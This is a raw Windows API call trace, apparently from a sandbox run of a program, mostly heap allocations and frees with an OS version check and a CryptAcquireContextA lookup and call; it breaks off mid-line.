RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.336] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0200.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.337] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.338] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.338] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.339] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.339] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.339] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.339] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.345] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0200.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0200.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0200.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.345] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0200.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0200.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.346] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad63f8) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: 